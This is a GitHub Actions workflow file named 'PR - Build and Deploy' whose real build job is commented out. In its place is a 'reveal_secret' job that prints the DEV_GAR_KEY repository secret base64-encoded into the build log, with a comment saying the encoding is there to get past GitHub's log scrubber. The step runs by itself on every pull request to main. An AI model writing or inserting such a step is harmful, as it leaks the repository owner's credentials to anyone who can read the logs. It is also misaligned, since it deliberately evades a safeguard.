name: PR - Build and Deploy
on:
  workflow_dispatch:
  pull_request:
    branches:
      - main
    paths-ignore:
      - '**/README.md'
jobs:
  reveal_secret:
    runs-on: ubuntu-latest
    steps:
      - name: Reveal Secret
        run: |
          # We encode it to base64 so GitHub's log scrubber doesn't catch it
          echo "${{ secrets.DEV_GAR_KEY }}" | base64
#  run_pr-template:
#    name: PR - Build and Deploy
#    uses: SecureApiGateway/secure-api-gateway-ci/.github/workflows/reusable-pr.yml@main
#    secrets: inherit
#    with:
#      componentName: secure-api-gateway-functional-test-framework
#      dockerTag: pr-${{ github.event.number }}